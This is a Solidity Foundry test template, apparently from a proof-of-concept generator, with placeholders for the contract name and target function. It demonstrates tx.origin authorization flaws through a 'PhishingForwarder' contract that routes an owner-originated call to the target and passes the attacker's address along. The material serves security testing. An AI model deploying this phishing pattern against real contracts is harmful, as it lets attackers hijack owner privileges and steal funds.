// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

// {{CUSTOM_IMPORTS}}

/**
 * @title {{CONTRACT_NAME}} tx.origin Exploit PoC
 * @notice Proof of Concept for tx.origin authorization
 * @dev Generated by MIESC PoC Generator
 *
 * Vulnerability: {{DESCRIPTION}}
 * Severity: {{SEVERITY}}
 * Target Function: {{TARGET_FUNCTION}}
 * Generated: {{TIMESTAMP}}
 */
contract {{CONTRACT_NAME}}TxOriginTest is Test {
    address public target;
    address public owner;
    address public attacker;
    PhishingForwarder public forwarder;

    function setUp() public {
        owner = makeAddr("owner");
        attacker = makeAddr("attacker");
        vm.deal(owner, {{VICTIM_BALANCE}});
        vm.deal(attacker, {{ATTACKER_BALANCE}});

        // {{FORK_CONFIG}}
        // target = address(new {{CONTRACT_NAME}}());
        // {{CUSTOM_SETUP}}

        forwarder = new PhishingForwarder(target, attacker);
    }

    function test_exploit_tx_origin_authorization() public {
        console.log("=== Starting tx.origin phishing PoC ===");

        vm.prank(owner, owner);
        forwarder.trickOwner("{{TARGET_FUNCTION}}()");

        // If target authorizes with tx.origin, the owner-originated call can execute
        // attacker-controlled behavior through the forwarder.
    }
}

contract PhishingForwarder {
    address public immutable target;
    address public immutable attacker;

    constructor(address _target, address _attacker) {
        target = _target;
        attacker = _attacker;
    }

    function trickOwner(string memory signature) external {
        (bool success,) = target.call(abi.encodeWithSignature(signature, attacker));
        require(success, "forwarded call failed");
    }
}
